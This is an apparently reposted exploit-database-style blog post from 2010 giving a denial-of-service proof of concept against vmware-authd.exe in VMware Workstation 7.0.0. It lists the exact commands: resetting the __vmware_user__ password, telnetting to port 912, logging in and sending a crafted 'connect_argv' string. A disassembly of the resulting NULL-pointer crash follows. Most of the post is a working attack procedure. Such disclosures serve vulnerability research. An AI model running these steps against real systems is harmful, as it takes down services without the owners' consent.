7/16/2010

VMWareWorkstation 7.0.0 build-203739 vmware-authd.exe DoS PoC

Exploit Title: VMWare-authd.exe DoS
Date: 16.07.2010
Software Link: http://vmware.com
Version: VMWare Workstation 7.0.0 build-203739
Platform / Tested on: Windows 7 Release Candidate

The unhandled exception arises during processing input data which is sent to port 912. But before U must reset password for the __vmware_user__.

Example:
Launch cmd.exe with admin privileges;
> net user __vmware_user__ NEW_PASS
> telnet 127.0.0.1 912
telnet> user __vmware_user__
telnet> pass NEW_PASS
telnet> connect_argv AAAA

After them connection will be aborted.
There is debug-session:

text:00407378 lea eax, [ebp+ppSZ] ;(==0)
text:0040737B push eax
text:0040737C lea ecx, [ebp+var_C]
text:0040737F push ecx
text:00407380 lea edx, [ebp+Memory]
text:00407383 push edx
text:00407384 lea eax, [ebp+pCmd] ; "connect_argv\x20\x20AAAA\x00\x0A"
text:0040738A push eax
text:0040738B mov [ebp+var_1], 0
text:0040738F call vm_authd_CheckArgs_CONNECT_ARGV
text:00407394 mov esi, [ebp+var_C]
text:00407397 mov ebx, [ebp+ppSZ] ; is NULL.
...
text:0040745D mov eax, [ebx] ; (ebx == 0) => APPCRASH
text:0040745F push eax ; Memory
text:00407460 call esi ; free

Комментариев нет:

Отправить комментарий